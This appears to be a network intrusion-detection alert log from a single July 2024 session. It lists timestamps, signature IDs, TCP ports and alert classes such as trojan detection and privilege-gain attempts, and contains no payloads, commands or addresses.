                      Timestamp:07/20/24-23:01:08.565561
                      SID:2831300
                      Source Port:34016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.456455
                      SID:2025132
                      Source Port:38254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2829579
                      Source Port:47214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.234149
                      SID:2027339
                      Source Port:44354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.556804
                      SID:2831300
                      Source Port:34306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:32.046185
                      SID:2835222
                      Source Port:37230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.677814
                      SID:2831300
                      Source Port:44632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2835222
                      Source Port:47872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.780168
                      SID:2027339
                      Source Port:41356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.019772
                      SID:2027339
                      Source Port:59776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.128003
                      SID:2027339
                      Source Port:40278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.949008
                      SID:2027339
                      Source Port:59820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.925238
                      SID:2831300
                      Source Port:53866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.104571
                      SID:2829579
                      Source Port:46718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.470424
                      SID:2025132
                      Source Port:40172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.062043
                      SID:2027339
                      Source Port:52772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.095462
                      SID:2829579
                      Source Port:55122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2829579
                      Source Port:41766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.038833
                      SID:2025132
                      Source Port:46014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.068033
                      SID:2025132
                      Source Port:39446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.213822
                      SID:2027339
                      Source Port:43154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.800757
                      SID:2027339
                      Source Port:34404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.389453
                      SID:2027339
                      Source Port:40138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2829579
                      Source Port:45458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.328855
                      SID:2831300
                      Source Port:47958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.789220
                      SID:2027339
                      Source Port:40438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2829579
                      Source Port:48874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2835222
                      Source Port:57796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974907
                      SID:2829579
                      Source Port:50664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653309
                      SID:2835222
                      Source Port:49318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.113661
                      SID:2831300
                      Source Port:58152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:43.182629
                      SID:2027339
                      Source Port:45054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.751560
                      SID:2025132
                      Source Port:43748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.653653
                      SID:2027339
                      Source Port:40142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.104633
                      SID:2027339
                      Source Port:58656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.672378
                      SID:2027339
                      Source Port:40310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.509003
                      SID:2025132
                      Source Port:43184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.631925
                      SID:2831300
                      Source Port:42362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.515992
                      SID:2027339
                      Source Port:52026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.594120
                      SID:2027339
                      Source Port:39454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.775798
                      SID:2027339
                      Source Port:32852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2835222
                      Source Port:44748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.507489
                      SID:2027339
                      Source Port:41820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.684338
                      SID:2027339
                      Source Port:54702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.374539
                      SID:2027339
                      Source Port:54890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.513792
                      SID:2025132
                      Source Port:47262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.047922
                      SID:2831300
                      Source Port:35292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.839991
                      SID:2025132
                      Source Port:38150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:48.060990
                      SID:2025132
                      Source Port:33080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.053604
                      SID:2835222
                      Source Port:54380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2829579
                      Source Port:52358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.280418
                      SID:2025132
                      Source Port:51174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.547334
                      SID:2027339
                      Source Port:37662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.052371
                      SID:2025132
                      Source Port:52100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.458734
                      SID:2027339
                      Source Port:41034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.280419
                      SID:2025132
                      Source Port:40114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.590937
                      SID:2027339
                      Source Port:34124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.060540
                      SID:2027339
                      Source Port:45630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.840364
                      SID:2027339
                      Source Port:54362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.164529
                      SID:2025132
                      Source Port:60322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.668802
                      SID:2027339
                      Source Port:52958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.613165
                      SID:2831300
                      Source Port:57364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.883172
                      SID:2829579
                      Source Port:39746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.735812
                      SID:2027339
                      Source Port:41760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.878540
                      SID:2027339
                      Source Port:42798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2835222
                      Source Port:49962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.770014
                      SID:2027339
                      Source Port:56962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.135090
                      SID:2025132
                      Source Port:45490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.053180
                      SID:2027339
                      Source Port:51216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.787907
                      SID:2027339
                      Source Port:43580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.053180
                      SID:2831300
                      Source Port:42650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.572556
                      SID:2027339
                      Source Port:53584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.902509
                      SID:2027339
                      Source Port:50868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.004063
                      SID:2027339
                      Source Port:40778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.228026
                      SID:2829579
                      Source Port:55100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.947663
                      SID:2027339
                      Source Port:45862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.158279
                      SID:2835222
                      Source Port:58944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.577562
                      SID:2025132
                      Source Port:53524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.782123
                      SID:2027339
                      Source Port:47614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.374543
                      SID:2027339
                      Source Port:54338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.296002
                      SID:2025132
                      Source Port:41596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2829579
                      Source Port:51548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.229743
                      SID:2025132
                      Source Port:47964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.629007
                      SID:2027339
                      Source Port:34300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2829579
                      Source Port:58466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.991545
                      SID:2025132
                      Source Port:48104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.075288
                      SID:2027339
                      Source Port:41624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.629007
                      SID:2831300
                      Source Port:34300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.251070
                      SID:2025132
                      Source Port:37010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.322110
                      SID:2027339
                      Source Port:46982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.256493
                      SID:2025132
                      Source Port:38542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:11.791090
                      SID:2025132
                      Source Port:44728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2835222
                      Source Port:46112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2835222
                      Source Port:39940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.357099
                      SID:2831300
                      Source Port:56596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.444817
                      SID:2027339
                      Source Port:54596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.228795
                      SID:2025132
                      Source Port:39798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.607934
                      SID:2027339
                      Source Port:51514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2835222
                      Source Port:58578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.210078
                      SID:2027339
                      Source Port:36794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.845923
                      SID:2027339
                      Source Port:44268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.924853
                      SID:2025132
                      Source Port:39902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.223887
                      SID:2829579
                      Source Port:51376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044152
                      SID:2829579
                      Source Port:59462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2829579
                      Source Port:32886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.663629
                      SID:2027339
                      Source Port:36982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2835222
                      Source Port:52086
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.283253
                      SID:2025132
                      Source Port:37266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.843278
                      SID:2027339
                      Source Port:40052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.920103
                      SID:2027339
                      Source Port:57122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2835222
                      Source Port:49182
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.066716
                      SID:2027339
                      Source Port:44782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.411586
                      SID:2027339
                      Source Port:37476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221313
                      SID:2829579
                      Source Port:37348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469580
                      SID:2025132
                      Source Port:57460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2835222
                      Source Port:42496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2835222
                      Source Port:41428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2829579
                      Source Port:53606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.751499
                      SID:2831300
                      Source Port:38742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.832956
                      SID:2025132
                      Source Port:42474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2835222
                      Source Port:53310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650037
                      SID:2829579
                      Source Port:36456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.800757
                      SID:2831300
                      Source Port:34404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.569820
                      SID:2025132
                      Source Port:59610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2829579
                      Source Port:37146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.151857
                      SID:2025132
                      Source Port:54136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.185981
                      SID:2025132
                      Source Port:59030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.428221
                      SID:2831300
                      Source Port:55678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.931222
                      SID:2027339
                      Source Port:52006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667964
                      SID:2831300
                      Source Port:49882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.314226
                      SID:2027339
                      Source Port:40464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2835222
                      Source Port:40244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.991143
                      SID:2835222
                      Source Port:35088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.395253
                      SID:2025132
                      Source Port:56002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.567236
                      SID:2831300
                      Source Port:57386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.313382
                      SID:2027339
                      Source Port:39784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.512162
                      SID:2027339
                      Source Port:36844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.634900
                      SID:2027339
                      Source Port:48196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.486106
                      SID:2025132
                      Source Port:56122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.726681
                      SID:2025132
                      Source Port:54012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2835222
                      Source Port:32994
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.021704
                      SID:2027339
                      Source Port:53752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.166507
                      SID:2025132
                      Source Port:46270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2829579
                      Source Port:53706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104571
                      SID:2835222
                      Source Port:43416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.193880
                      SID:2025132
                      Source Port:53462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.677933
                      SID:2027339
                      Source Port:49330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2835222
                      Source Port:39682
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.858207
                      SID:2025132
                      Source Port:51006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.627153
                      SID:2027339
                      Source Port:37094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633642
                      SID:2835222
                      Source Port:42434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317668
                      SID:2027339
                      Source Port:56692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.040108
                      SID:2027339
                      Source Port:60648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.519802
                      SID:2027339
                      Source Port:39112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.182734
                      SID:2027339
                      Source Port:50088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.001231
                      SID:2025132
                      Source Port:46446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.353592
                      SID:2025132
                      Source Port:46456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:51.152216
                      SID:2025132
                      Source Port:51020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:53.715694
                      SID:2027339
                      Source Port:38326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.107973
                      SID:2027339
                      Source Port:49530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.560945
                      SID:2027339
                      Source Port:43414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.330511
                      SID:2831300
                      Source Port:44976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.974907
                      SID:2829579
                      Source Port:59308
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.850516
                      SID:2831300
                      Source Port:56446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.648154
                      SID:2027339
                      Source Port:49290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.253863
                      SID:2831300
                      Source Port:49652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.810783
                      SID:2025132
                      Source Port:49636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.463055
                      SID:2831300
                      Source Port:42220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.614193
                      SID:2027339
                      Source Port:54848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.766239
                      SID:2835222
                      Source Port:53782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2835222
                      Source Port:38506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.632121
                      SID:2025132
                      Source Port:57462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:17.128771
                      SID:2025132
                      Source Port:55714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.806645
                      SID:2027339
                      Source Port:40026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2829579
                      Source Port:36734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.276434
                      SID:2027339
                      Source Port:46648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.968362
                      SID:2027339
                      Source Port:53002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2835222
                      Source Port:60452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2835222
                      Source Port:58124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.299793
                      SID:2025132
                      Source Port:45716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.727406
                      SID:2027339
                      Source Port:49250
